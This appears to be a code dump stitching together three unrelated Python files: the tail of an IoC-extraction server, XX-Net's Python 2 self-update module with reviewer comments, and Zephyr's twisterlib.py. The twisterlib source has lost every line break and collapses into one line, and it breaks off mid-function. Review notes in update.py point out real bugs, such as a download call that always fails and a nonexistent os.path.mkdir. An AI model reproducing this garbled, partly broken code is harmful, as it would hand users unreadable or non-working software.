                        threads.append(
                            Thread(target=Extractor.extract, args=(os.path.join(DOCKER_REPORTS_PATH, report),)))
                for instance in threads:
                    instance.start()
                # Wait for the whole batch so scheduled runs do not overlap.
                for instance in threads:
                    instance.join()
        except Exception as error:
            LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log()

    def __call__(self, app, *args, **kwargs):
        '''
        __call__ will be executed before the server creation and run some
        functions on startup. A topic will be created for the IoC's and the
        scheduler will be started for the cron-jobs.

        @param self is the Server-Object.
        @param app will be the app passed to the __call__ function of the server-class
        @param *args and **kwargs will be the vargs passed to the __call__ function of the server-class
        '''
        create_topic_if_not_exists(KAFKA_SERVER, IOC_TOPIC_NAME)
        # Refresh the shared blacklist once at startup.
        Extractor.BLACKLIST = Extractor.refetch_blacklist()
        scheduler.start()
        # Background consumer runs for the life of the process (daemon thread).
        Thread(target=Extractor.consume_findings_from_scraper, daemon=True).start()
        return Server.__call__(self, app, *args, **kwargs)
# ==== file: update.py ====
#!/usr/bin/env python
# coding:utf-8
# XX-Net self-update module (Python 2 era code: urllib2, builtin reduce,
# u"" literals). Periodically checks GitHub / a push-update endpoint for new
# module versions, downloads and installs them, with per-platform tray prompts.
import os
import urllib2
import json
import time
import threading
import zipfile
import sys
import platform
from distutils.version import LooseVersion
from instances import xlog
import config
import uuid
import update_from_github

#opener = urllib2.build_opener()
#update_url = "http://127.0.0.1:8080/update.json"
update_url = "https://xxnet-update.appspot.com/update.json"
update_content = ""   # raw JSON body of the last push-update response
update_dict = {}      # parsed form of update_content
new_gae_proxy_version = ""
gae_proxy_path = ""

current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath(os.path.join(current_path, os.pardir))
data_root = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data'))


def get_opener():
    # Build a urllib2 opener that routes through the local gae_proxy
    # (127.0.0.1:8087), trusting the bundled CA certificate when the running
    # ssl module supports create_default_context.
    autoproxy = '127.0.0.1:8087'
    import ssl
    if getattr(ssl, "create_default_context", None):
        cafile = os.path.join(data_root, "gae_proxy", "CA.crt")
        if not os.path.isfile(cafile):
            cafile = None
        context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH, cafile=cafile)
        https_handler = urllib2.HTTPSHandler(context=context)
        opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}), https_handler)
    else:
        opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}))
    return opener


def version_to_bin(s):
    # Pack a dotted version string ("1.2.3") into one integer, 8 bits per
    # component, so versions compare numerically. Relies on the Python 2
    # builtin `reduce`.
    return reduce(lambda a, b: a << 8 | b, map(int, s.split(".")))


def download_file(url, file):
    # Stream `url` to local path `file` in 16 KiB chunks via the proxy opener.
    # Returns True on success, False on any failure.
    try:
        xlog.info("download %s to %s", url, file)
        opener = get_opener()
        # NOTE(review): OpenerDirector.open() accepts (url, data, timeout) —
        # there is no `cafile` keyword. This call raises TypeError, which the
        # bare except below swallows, so every download fails. Presumably it
        # should read `opener.open(url)` — TODO confirm and fix.
        req = opener.open(url, cafile="")
        CHUNK = 16 * 1024
        with open(file, 'wb') as fp:
            while True:
                chunk = req.read(CHUNK)
                if not chunk:
                    break
                fp.write(chunk)
        return True
    except:
        # NOTE(review): bare except hides the real error class; at minimum
        # `except Exception` plus logging the exception would be safer.
        xlog.info("download %s to %s fail", url, file)
        return False


def sha1_file(filename):
    # Return the hex SHA-1 of `filename` read in 64 KiB blocks, or False if
    # the file cannot be read.
    import hashlib
    BLOCKSIZE = 65536
    hasher = hashlib.sha1()
    try:
        with open(filename, 'rb') as afile:
            buf = afile.read(BLOCKSIZE)
            while len(buf) > 0:
                hasher.update(buf)
                buf = afile.read(BLOCKSIZE)
        return hasher.hexdigest()
    except:
        return False


def install_module(module, new_version):
    # Run the downloaded module's setup.py and restart it. For the launcher
    # module the whole process is replaced (os._exit after spawning setup).
    import module_init
    import os, subprocess, sys
    current_path = os.path.dirname(os.path.abspath(__file__))
    new_module_version_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, module, new_version))
    #check path exist
    if not os.path.isdir(new_module_version_path):
        xlog.error("install module %s dir %s not exist", module, new_module_version_path)
        return
    #call setup.py
    setup_script = os.path.join(new_module_version_path, "setup.py")
    if not os.path.isfile(setup_script):
        xlog.warn("update %s fail. setup script %s not exist", module, setup_script)
        return
    config.set(["modules", module, "current_version"], str(new_version))
    config.save()
    if module == "launcher":
        # Updating the launcher means updating ourselves: stop everything,
        # hand over to the new setup script and exit hard.
        module_init.stop_all()
        import web_control
        web_control.stop()
        subprocess.Popen([sys.executable, setup_script], shell=False)
        os._exit(0)
    else:
        xlog.info("Setup %s version %s ...", module, new_version)
        try:
            module_init.stop(module)
            subprocess.call([sys.executable, setup_script], shell=False)
            xlog.info("Finished new version setup.")
            xlog.info("Restarting new version ...")
            module_init.start(module)
        except Exception as e:
            xlog.error("install module %s %s fail:%s", module, new_version, e)


def download_module(module, new_version):
    # Download the zip for `module`/`new_version` from the first working
    # source listed in update_dict, verify its SHA-1, unzip it into the
    # module directory, then prompt the user (per platform) to install.
    import os
    global update_content, update_dict
    current_path = os.path.dirname(os.path.abspath(__file__))
    download_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, 'data', 'downloads'))
    if not os.path.isdir(download_path):
        os.mkdir(download_path)
    try:
        for source in update_dict["modules"][module]["versions"][new_version]["sources"]:
            url = source["url"]
            filename = module + "-" + new_version + ".zip"
            file_path = os.path.join(download_path, filename)
            # Reuse a previously downloaded archive if its checksum matches.
            if os.path.isfile(file_path) and sha1_file(file_path) == update_dict["modules"][module]["versions"][new_version]["sha1"]:
                pass
            elif not download_file(url, file_path):
                xlog.warn("download %s fail", url)
                continue
            sha1 = sha1_file(file_path)
            if update_dict["modules"][module]["versions"][new_version]["sha1"] != sha1:
                xlog.warn("download %s sha1 wrong", url)
                continue
            module_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir, module))
            if not os.path.isdir(module_path):
                # NOTE(review): BUG — os.path has no mkdir(), and the mode
                # argument must be an int. This raises AttributeError (caught
                # by the outer except) whenever the module dir is missing.
                # Should presumably be os.mkdir(module_path, 0o755).
                os.path.mkdir(module_path, "755")
            version_path = os.path.join(module_path, new_version)
            if os.path.isdir(version_path):
                xlog.error("module dir exist:%s, download exist.", version_path)
                return
            with zipfile.ZipFile(file_path, "r") as dz:
                dz.extractall(module_path)
                # NOTE(review): redundant — the with-statement already closes.
                dz.close()
            import shutil
            # The archive extracts as "<module>-<version>"; rename to "<version>".
            unzip_path = os.path.abspath(os.path.join(module_path, module + "-" + new_version))
            tag_path = os.path.abspath(os.path.join(module_path, new_version))
            shutil.move(unzip_path, tag_path)
            msg = "Module %s new version %s downloaded, Install?" % (module, new_version)
            # Per-platform "install now?" prompt via the system tray.
            if sys.platform == "linux" or sys.platform == "linux2":
                from gtk_tray import sys_tray
                data_install = "%s|%s|install" % (module, new_version)
                data_ignore = "%s|%s|ignore" % (module, new_version)
                buttons = {1: {"data": data_install, "label": "Install", 'callback': general_gtk_callback},
                           2: {"data": data_ignore, "label": "Ignore", 'callback': general_gtk_callback}}
                sys_tray.notify_general(msg=msg, title="Install", buttons=buttons)
            elif sys.platform == "win32":
                from win_tray import sys_tray
                if sys_tray.dialog_yes_no(msg, u"Install", None, None) == 1:
                    install_module(module, new_version)
                else:
                    ignore_module(module, new_version)
            elif sys.platform == "darwin":
                from mac_tray import sys_tray
                if sys_tray.presentAlert_withTitle_(msg, "Install"):
                    install_module(module, new_version)
                else:
                    ignore_module(module, new_version)
            else:
                install_module(module, new_version)
            # First successful source wins.
            break
    except Exception as e:
        xlog.warn("get gae_proxy source fail, content:%s err:%s", update_content, e)


def ignore_module(module, new_version):
    # Remember that the user declined this version so we stop nagging.
    config.set(["modules", module, "ignore_version"], str(new_version))
    config.save()


def general_gtk_callback(widget=None, data=None):
    # GTK tray-button callback. `data` is "module|version|action" where
    # action is one of download / install / ignore.
    args = data.split('|')
    if len(args) != 3:
        xlog.error("general_gtk_callback data:%s", data)
        return
    module = args[0]
    new_version = args[1]
    action = args[2]
    if action == "download":
        download_module(module, new_version)
    elif action == "install":
        install_module(module, new_version)
    elif action == "ignore":
        ignore_module(module, new_version)


def check_update():
    # Main update check: honours the "check_update" config rule
    # (dont-check / stable / test), reports to the push-update endpoint, and
    # upgrades via update_from_github when a newer version is published.
    try:
        update_rule = config.get(["update", "check_update"], "stable")
        if update_rule == "dont-check":
            return
        check_push_update()
        if update_rule != "stable" and update_rule != "test":
            return
        versions = update_from_github.get_github_versions()
        current_version = update_from_github.current_version()
        # versions[0] is the newest (test) release, versions[1] the stable one
        # — presumably; TODO confirm against update_from_github.
        if update_rule == "test":
            if LooseVersion(current_version) < LooseVersion(versions[0][1]):
                xlog.info("update to test version %s", versions[0][1])
                update_from_github.update_version(versions[0][1])
        elif update_rule == "stable":
            if LooseVersion(current_version) < LooseVersion(versions[1][1]):
                xlog.info("update to stable version %s", versions[1][1])
                update_from_github.update_version(versions[1][1])
    except IOError as e:
        xlog.warn("check update fail:%r", e)
    except Exception as e:
        xlog.exception("check_update fail:%r", e)


def check_push_update():
    # Report uuid/version/platform to the push-update endpoint and parse the
    # response into update_dict. Returns True when the response parsed,
    # False when the request failed.
    global update_content, update_dict
    try:
        opener = get_opener()
        req_url = update_url + "?uuid=" + get_uuid() \
            + "&version=" + update_from_github.current_version() \
            + "&platform=" + platform.platform()
        try:
            update_content = opener.open(req_url).read()
        except Exception as e:
            xlog.warn("check_update fail:%r", e)
            return False
        update_dict = json.loads(update_content)
        return True

        # NOTE(review): everything below this `return True` is unreachable —
        # the per-module push-update notification flow appears to have been
        # deliberately disabled. Kept verbatim; confirm intent before deleting.
        for module in update_dict["modules"]:
            new_version = str(update_dict["modules"][module]["last_version"])
            describe = update_dict["modules"][module]["versions"][new_version]["describe"]
            if update_dict["modules"][module]["versions"][new_version]["notify"] != "true":
                continue
            if not module in config.config["modules"]:
                ignore_version = 0
                current_version = 0
                config.config["modules"][module] = {}
                config.config["modules"][module]["current_version"] = '0.0.0'
            else:
                current_version = config.get(["modules", module, "current_version"])
                if "ignore_version" in config.config["modules"][module]:
                    ignore_version = config.config["modules"][module]["ignore_version"]
                else:
                    ignore_version = current_version
            if version_to_bin(new_version) <= version_to_bin(ignore_version):
                continue
            if version_to_bin(new_version) > version_to_bin(current_version):
                xlog.info("new %s version:%s", module, new_version)
                if sys.platform == "linux" or sys.platform == "linux2":
                    from gtk_tray import sys_tray
                    msg = "Module %s new version: %s, Download?\nNew:%s" % (module, new_version, describe)
                    data_download = "%s|%s|download" % (module, new_version)
                    data_ignore = "%s|%s|ignore" % (module, new_version)
                    buttons = {1: {"data": data_download, "label": "Download", 'callback': general_gtk_callback},
                               2: {"data": data_ignore, "label": "Ignore", 'callback': general_gtk_callback}}
                    sys_tray.notify_general(msg=msg, title="New Version", buttons=buttons)
                elif sys.platform == "win32":
                    from win_tray import sys_tray
                    msg = "Module %s new version: %s, Download?" % (module, new_version)
                    if sys_tray.dialog_yes_no(msg, u"Download", None, None) == 1:
                        download_module(module, new_version)
                    else:
                        ignore_module(module, new_version)
                elif sys.platform == "darwin":
                    from mac_tray import sys_tray
                    msg = "Module %s new version: %s, Download?" % (module, new_version)
                    if sys_tray.presentAlert_withTitle_(msg, "Download"):
                        download_module(module, new_version)
                    else:
                        ignore_module(module, new_version)
                else:
                    download_module(module, new_version)
    except Exception as e:
        xlog.exception("check_update except:%s", e)
        return


def create_desktop_shortcut():
    # Create a desktop shortcut on Windows via the bundled JScript helper;
    # no-op on Linux (and implicitly on macOS).
    import sys
    if sys.platform.startswith("linux"):
        pass
    elif sys.platform == "win32":
        # Disabled confirmation dialog, kept verbatim.
        # (Chinese comments translate to: "Create a desktop icon?" /
        # "XX-Net" product name.)
        # import ctypes
        # msg = u"是否在桌面创建图标?"
        # title = u"XX-Net 叉叉网"
        #res = ctypes.windll.user32.MessageBoxW(None, msg, title, 1)
        # Yes:1 No:2
        #if res == 2:
        #    return
        work_path = os.path.dirname(os.path.abspath(__file__))
        os.chdir(work_path)
        import subprocess
        subprocess.call(["Wscript.exe", "//E:JScript", "create_shortcut.js"], shell=False)


def notify_install_tcpz_for_winXp():
    # Windows XP only: show a message box. The (runtime, user-facing) Chinese
    # string translates to: "Please patch tcpip.sys with tcp-z to lift the
    # concurrent-connection limit!"
    import ctypes
    ctypes.windll.user32.MessageBoxW(None, u"请使用tcp-z对 tcpip.sys 打补丁,解决链接并发限制!", u"Patch XP needed", 0)


def check_new_machine():
    # Detect that the install directory changed (fresh install / moved copy)
    # and perform first-run actions: XP patch notice and desktop shortcut.
    current_path = os.path.dirname(os.path.abspath(__file__))
    if current_path != config.get(["update", "last_path"], ""):
        config.set(["update", "last_path"], current_path)
        config.save()
        if sys.platform == "win32" and platform.release() == "XP":
            notify_install_tcpz_for_winXp()
        xlog.info("generate desktop shortcut")
        create_desktop_shortcut()


def check_loop():
    # Background loop: first-run check, then one update check per day.
    check_new_machine()
    #wait gae_proxy to start
    #update need gae_proxy as proxy
    time.sleep(1)
    while True:
        check_update()
        time.sleep(3600 * 24)


def start():
    # Launch the daily update checker as a daemon thread.
    p = threading.Thread(target=check_loop)
    p.setDaemon(True)
    p.start()


def need_new_uuid():
    # True when no install uuid has been persisted yet.
    if not config.get(["update", "uuid"]):
        xlog.info("need_new_uuid: uuid is empty")
        return True
    return False


def generate_new_uuid():
    # Create and persist a random install uuid.
    xx_net_uuid = str(uuid.uuid4())
    config.set(["update", "uuid"], xx_net_uuid)
    xlog.info("generate uuid:%s", xx_net_uuid)
    config.save()


def get_uuid():
    # Return the persistent install uuid, creating it on first use.
    if need_new_uuid():
        generate_new_uuid()
    xx_net_uuid = config.get(["update", "uuid"])
    xlog.info("get uuid:%s", xx_net_uuid)
    return xx_net_uuid


if __name__ == "__main__":
    #get_uuid()
    #check_update()
    #sys_tray.serve_forever()
    create_desktop_shortcut()
# ==== file: twisterlib.py ====
#!/usr/bin/env python3 # vim: set syntax=python ts=4 : # # Copyright (c) 2018 Intel Corporation # SPDX-License-Identifier: Apache-2.0 import os import contextlib import string import mmap import sys import re import subprocess import select import shutil import shlex import signal import threading import concurrent.futures from collections import OrderedDict import queue import time import csv import glob import concurrent import xml.etree.ElementTree as ET import logging from pathlib import Path from distutils.spawn import find_executable from colorama import Fore import pickle import platform import yaml import json from multiprocessing import Lock, Process, Value from typing import List try: # Use the C LibYAML parser if available, rather than the Python parser. # It's much faster. from yaml import CSafeLoader as SafeLoader from yaml import CDumper as Dumper except ImportError: from yaml import SafeLoader, Dumper try: import serial except ImportError: print("Install pyserial python module with pip to use --device-testing option.") try: from tabulate import tabulate except ImportError: print("Install tabulate python module with pip to use --device-testing option.") try: import psutil except ImportError: print("Install psutil python module with pip to run in Qemu.") try: import pty except ImportError as capture_error: if os.name == "nt": # "nt" means that program is running on Windows OS pass # "--device-serial-pty" option is not supported on Windows OS else: raise capture_error ZEPHYR_BASE = os.getenv("ZEPHYR_BASE") if not ZEPHYR_BASE: sys.exit("$ZEPHYR_BASE environment variable undefined") # This is needed to load edt.pickle files. sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts", "python-devicetree", "src")) from devicetree import edtlib # pylint: disable=unused-import # Use this for internal comparisons; that's what canonicalization is # for. 
Don't use it when invoking other components of the build system # to avoid confusing and hard to trace inconsistencies in error messages # and logs, generated Makefiles, etc. compared to when users invoke these # components directly. # Note "normalization" is different from canonicalization, see os.path. canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE) sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/")) import scl import expr_parser logger = logging.getLogger('twister') logger.setLevel(logging.DEBUG) class ExecutionCounter(object): def __init__(self, total=0): self._done = Value('i', 0) self._passed = Value('i', 0) self._skipped_configs = Value('i', 0) self._skipped_runtime = Value('i', 0) self._skipped_cases = Value('i', 0) self._error = Value('i', 0) self._failed = Value('i', 0) self._total = Value('i', total) self._cases = Value('i', 0) self.lock = Lock() @property def cases(self): with self._cases.get_lock(): return self._cases.value @cases.setter def cases(self, value): with self._cases.get_lock(): self._cases.value = value @property def skipped_cases(self): with self._skipped_cases.get_lock(): return self._skipped_cases.value @skipped_cases.setter def skipped_cases(self, value): with self._skipped_cases.get_lock(): self._skipped_cases.value = value @property def error(self): with self._error.get_lock(): return self._error.value @error.setter def error(self, value): with self._error.get_lock(): self._error.value = value @property def done(self): with self._done.get_lock(): return self._done.value @done.setter def done(self, value): with self._done.get_lock(): self._done.value = value @property def passed(self): with self._passed.get_lock(): return self._passed.value @passed.setter def passed(self, value): with self._passed.get_lock(): self._passed.value = value @property def skipped_configs(self): with self._skipped_configs.get_lock(): return self._skipped_configs.value @skipped_configs.setter def skipped_configs(self, value): with 
self._skipped_configs.get_lock(): self._skipped_configs.value = value @property def skipped_runtime(self): with self._skipped_runtime.get_lock(): return self._skipped_runtime.value @skipped_runtime.setter def skipped_runtime(self, value): with self._skipped_runtime.get_lock(): self._skipped_runtime.value = value @property def failed(self): with self._failed.get_lock(): return self._failed.value @failed.setter def failed(self, value): with self._failed.get_lock(): self._failed.value = value @property def total(self): with self._total.get_lock(): return self._total.value class CMakeCacheEntry: '''Represents a CMake cache entry. This class understands the type system in a CMakeCache.txt, and converts the following cache types to Python types: Cache Type Python type ---------- ------------------------------------------- FILEPATH str PATH str STRING str OR list of str (if ';' is in the value) BOOL bool INTERNAL str OR list of str (if ';' is in the value) ---------- ------------------------------------------- ''' # Regular expression for a cache entry. # # CMake variable names can include escape characters, allowing a # wider set of names than is easy to match with a regular # expression. To be permissive here, use a non-greedy match up to # the first colon (':'). This breaks if the variable name has a # colon inside, but it's good enough. CACHE_ENTRY = re.compile( r'''(?P<name>.*?) # name :(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type =(?P<value>.*) # value ''', re.X) @classmethod def _to_bool(cls, val): # Convert a CMake BOOL string into a Python bool. # # "True if the constant is 1, ON, YES, TRUE, Y, or a # non-zero number. False if the constant is 0, OFF, NO, # FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in # the suffix -NOTFOUND. Named boolean constants are # case-insensitive. If the argument is not one of these # constants, it is treated as a variable." 
# # https://cmake.org/cmake/help/v3.0/command/if.html val = val.upper() if val in ('ON', 'YES', 'TRUE', 'Y'): return 1 elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''): return 0 elif val.endswith('-NOTFOUND'): return 0 else: try: v = int(val) return v != 0 except ValueError as exc: raise ValueError('invalid bool {}'.format(val)) from exc @classmethod def from_line(cls, line, line_no): # Comments can only occur at the beginning of a line. # (The value of an entry could contain a comment character). if line.startswith('//') or line.startswith('#'): return None # Whitespace-only lines do not contain cache entries. if not line.strip(): return None m = cls.CACHE_ENTRY.match(line) if not m: return None name, type_, value = (m.group(g) for g in ('name', 'type', 'value')) if type_ == 'BOOL': try: value = cls._to_bool(value) except ValueError as exc: args = exc.args + ('on line {}: {}'.format(line_no, line),) raise ValueError(args) from exc elif type_ in ['STRING', 'INTERNAL']: # If the value is a CMake list (i.e. is a string which # contains a ';'), convert to a Python list. 
if ';' in value: value = value.split(';') return CMakeCacheEntry(name, value) def __init__(self, name, value): self.name = name self.value = value def __str__(self): fmt = 'CMakeCacheEntry(name={}, value={})' return fmt.format(self.name, self.value) class CMakeCache: '''Parses and represents a CMake cache file.''' @staticmethod def from_file(cache_file): return CMakeCache(cache_file) def __init__(self, cache_file): self.cache_file = cache_file self.load(cache_file) def load(self, cache_file): entries = [] with open(cache_file, 'r') as cache: for line_no, line in enumerate(cache): entry = CMakeCacheEntry.from_line(line, line_no) if entry: entries.append(entry) self._entries = OrderedDict((e.name, e) for e in entries) def get(self, name, default=None): entry = self._entries.get(name) if entry is not None: return entry.value else: return default def get_list(self, name, default=None): if default is None: default = [] entry = self._entries.get(name) if entry is not None: value = entry.value if isinstance(value, list): return value elif isinstance(value, str): return [value] if value else [] else: msg = 'invalid value {} type {}' raise RuntimeError(msg.format(value, type(value))) else: return default def __contains__(self, name): return name in self._entries def __getitem__(self, name): return self._entries[name].value def __setitem__(self, name, entry): if not isinstance(entry, CMakeCacheEntry): msg = 'improper type {} for value {}, expecting CMakeCacheEntry' raise TypeError(msg.format(type(entry), entry)) self._entries[name] = entry def __delitem__(self, name): del self._entries[name] def __iter__(self): return iter(self._entries.values()) class TwisterException(Exception): pass class TwisterRuntimeError(TwisterException): pass class ConfigurationError(TwisterException): def __init__(self, cfile, message): TwisterException.__init__(self, cfile + ": " + message) class BuildError(TwisterException): pass class ExecutionError(TwisterException): pass class HarnessImporter: 
def __init__(self, name): sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister")) module = __import__("harness") if name: my_class = getattr(module, name) else: my_class = getattr(module, "Test") self.instance = my_class() class Handler: def __init__(self, instance, type_str="build"): """Constructor """ self.state = "waiting" self.run = False self.duration = 0 self.type_str = type_str self.binary = None self.pid_fn = None self.call_make_run = False self.name = instance.name self.instance = instance self.timeout = instance.testcase.timeout self.sourcedir = instance.testcase.source_dir self.build_dir = instance.build_dir self.log = os.path.join(self.build_dir, "handler.log") self.returncode = 0 self.set_state("running", self.duration) self.generator = None self.generator_cmd = None self.args = [] self.terminated = False def set_state(self, state, duration): self.state = state self.duration = duration def get_state(self): ret = (self.state, self.duration) return ret def record(self, harness): if harness.recording: filename = os.path.join(self.build_dir, "recording.csv") with open(filename, "at") as csvfile: cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep) cw.writerow(harness.fieldnames) for instance in harness.recording: cw.writerow(instance) def terminate(self, proc): # encapsulate terminate functionality so we do it consistently where ever # we might want to terminate the proc. We need try_kill_process_by_pid # because of both how newer ninja (1.6.0 or greater) and .NET / renode # work. Newer ninja's don't seem to pass SIGTERM down to the children # so we need to use try_kill_process_by_pid. for child in psutil.Process(proc.pid).children(recursive=True): try: os.kill(child.pid, signal.SIGTERM) except ProcessLookupError: pass proc.terminate() # sleep for a while before attempting to kill time.sleep(0.5) proc.kill() self.terminated = True def add_missing_testscases(self, harness): """ If testsuite was broken by some error (e.g. 
timeout) it is necessary to add information about next testcases, which were not be performed due to this error. """ for c in self.instance.testcase.cases: if c not in harness.tests: harness.tests[c] = "BLOCK" class BinaryHandler(Handler): def __init__(self, instance, type_str): """Constructor @param instance Test Instance """ super().__init__(instance, type_str) self.call_west_flash = False # Tool options self.valgrind = False self.lsan = False self.asan = False self.ubsan = False self.coverage = False def try_kill_process_by_pid(self): if self.pid_fn: pid = int(open(self.pid_fn).read()) os.unlink(self.pid_fn) self.pid_fn = None # clear so we don't try to kill the binary twice try: os.kill(pid, signal.SIGTERM) except ProcessLookupError: pass def _output_reader(self, proc): self.line = proc.stdout.readline() def _output_handler(self, proc, harness): if harness.is_pytest: harness.handle(None) return log_out_fp = open(self.log, "wt") timeout_extended = False timeout_time = time.time() + self.timeout while True: this_timeout = timeout_time - time.time() if this_timeout < 0: break reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True) reader_t.start() reader_t.join(this_timeout) if not reader_t.is_alive(): line = self.line logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip())) log_out_fp.write(line.decode('utf-8')) log_out_fp.flush() harness.handle(line.decode('utf-8').rstrip()) if harness.state: if not timeout_extended or harness.capture_coverage: timeout_extended = True if harness.capture_coverage: timeout_time = time.time() + 30 else: timeout_time = time.time() + 2 else: reader_t.join(0) break try: # POSIX arch based ztests end on their own, # so let's give it up to 100ms to do so proc.wait(0.1) except subprocess.TimeoutExpired: self.terminate(proc) log_out_fp.close() def handle(self): harness_name = self.instance.testcase.harness.capitalize() harness_import = HarnessImporter(harness_name) harness = harness_import.instance 
harness.configure(self.instance) if self.call_make_run: command = [self.generator_cmd, "run"] elif self.call_west_flash: command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir] else: command = [self.binary] run_valgrind = False if self.valgrind and shutil.which("valgrind"): command = ["valgrind", "--error-exitcode=2", "--leak-check=full", "--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp", "--log-file=" + self.build_dir + "/valgrind.log" ] + command run_valgrind = True logger.debug("Spawning process: " + " ".join(shlex.quote(word) for word in command) + os.linesep + "in directory: " + self.build_dir) start_time = time.time() env = os.environ.copy() if self.asan: env["ASAN_OPTIONS"] = "log_path=stdout:" + \ env.get("ASAN_OPTIONS", "") if not self.lsan: env["ASAN_OPTIONS"] += "detect_leaks=0" if self.ubsan: env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \ env.get("UBSAN_OPTIONS", "") with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc: logger.debug("Spawning BinaryHandler Thread for %s" % self.name) t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True) t.start() t.join() if t.is_alive(): self.terminate(proc) t.join() proc.wait() self.returncode = proc.returncode self.try_kill_process_by_pid() handler_time = time.time() - start_time if self.coverage: subprocess.call(["GCOV_PREFIX=" + self.build_dir, "gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True) # FIXME: This is needed when killing the simulator, the console is # garbled and needs to be reset. Did not find a better way to do that. 
if sys.stdout.isatty(): subprocess.call(["stty", "sane"]) if harness.is_pytest: harness.pytest_run(self.log) self.instance.results = harness.tests if not self.terminated and self.returncode != 0: # When a process is killed, the default handler returns 128 + SIGTERM # so in that case the return code itself is not meaningful self.set_state("failed", handler_time) self.instance.reason = "Failed" elif run_valgrind and self.returncode == 2: self.set_state("failed", handler_time) self.instance.reason = "Valgrind error" elif harness.state: self.set_state(harness.state, handler_time) if harness.state == "failed": self.instance.reason = "Failed" else: self.set_state("timeout", handler_time) self.instance.reason = "Timeout" self.add_missing_testscases(harness) self.record(harness) class DeviceHandler(Handler): def __init__(self, instance, type_str): """Constructor @param instance Test Instance """ super().__init__(instance, type_str) self.suite = None def monitor_serial(self, ser, halt_fileno, harness): if harness.is_pytest: harness.handle(None) return log_out_fp = open(self.log, "wt") ser_fileno = ser.fileno() readlist = [halt_fileno, ser_fileno] if self.coverage: # Set capture_coverage to True to indicate that right after # test results we should get coverage data, otherwise we exit # from the test. harness.capture_coverage = True ser.flush() while ser.isOpen(): readable, _, _ = select.select(readlist, [], [], self.timeout) if halt_fileno in readable: logger.debug('halted') ser.close() break if ser_fileno not in readable: continue # Timeout. serial_line = None try: serial_line = ser.readline() except TypeError: pass except serial.SerialException: ser.close() break # Just because ser_fileno has data doesn't mean an entire line # is available yet. 
if serial_line: sl = serial_line.decode('utf-8', 'ignore').lstrip() logger.debug("DEVICE: {0}".format(sl.rstrip())) log_out_fp.write(sl) log_out_fp.flush() harness.handle(sl.rstrip()) if harness.state: if not harness.capture_coverage: ser.close() break log_out_fp.close() def device_is_available(self, instance): device = instance.platform.name fixture = instance.testcase.harness_config.get("fixture") for d in self.suite.duts: if fixture and fixture not in d.fixtures: continue if d.platform != device or not (d.serial or d.serial_pty): continue d.lock.acquire() avail = False if d.available: d.available = 0 d.counter += 1 avail = True d.lock.release() if avail: return d return None def make_device_available(self, serial): for d in self.suite.duts: if d.serial == serial or d.serial_pty: d.available = 1 @staticmethod def run_custom_script(script, timeout): with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc: try: stdout, _ = proc.communicate(timeout=timeout) logger.debug(stdout.decode()) except subprocess.TimeoutExpired: proc.kill() proc.communicate() logger.error("{} timed out".format(script)) def handle(self): out_state = "failed" runner = None hardware = self.device_is_available(self.instance) while not hardware: logger.debug("Waiting for device {} to become available".format(self.instance.platform.name)) time.sleep(1) hardware = self.device_is_available(self.instance) runner = hardware.runner or self.suite.west_runner serial_pty = hardware.serial_pty ser_pty_process = None if serial_pty: master, slave = pty.openpty() try: ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master) except subprocess.CalledProcessError as error: logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output)) return serial_device = os.ttyname(slave) else: serial_device = hardware.serial logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud") if 
(self.suite.west_flash is not None) or runner: command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir] command_extra_args = [] # There are three ways this option is used. # 1) bare: --west-flash # This results in options.west_flash == [] # 2) with a value: --west-flash="--board-id=42" # This results in options.west_flash == "--board-id=42" # 3) Multiple values: --west-flash="--board-id=42,--erase" # This results in options.west_flash == "--board-id=42 --erase" if self.suite.west_flash and self.suite.west_flash != []: command_extra_args.extend(self.suite.west_flash.split(',')) if runner: command.append("--runner") command.append(runner) board_id = hardware.probe_id or hardware.id product = hardware.product if board_id is not None: if runner == "pyocd": command_extra_args.append("--board-id") command_extra_args.append(board_id) elif runner == "nrfjprog": command_extra_args.append("--dev-id") command_extra_args.append(board_id) elif runner == "openocd" and product == "STM32 STLink": command_extra_args.append("--cmd-pre-init") command_extra_args.append("hla_serial %s" % (board_id)) elif runner == "openocd" and product == "STLINK-V3": command_extra_args.append("--cmd-pre-init") command_extra_args.append("hla_serial %s" % (board_id)) elif runner == "openocd" and product == "EDBG CMSIS-DAP": command_extra_args.append("--cmd-pre-init") command_extra_args.append("cmsis_dap_serial %s" % (board_id)) elif runner == "jlink": command.append("--tool-opt=-SelectEmuBySN %s" % (board_id)) elif runner == "stm32cubeprogrammer": command.append("--tool-opt=sn=%s" % (board_id)) if command_extra_args != []: command.append('--') command.extend(command_extra_args) else: command = [self.generator_cmd, "-C", self.build_dir, "flash"] pre_script = hardware.pre_script post_flash_script = hardware.post_flash_script post_script = hardware.post_script if pre_script: 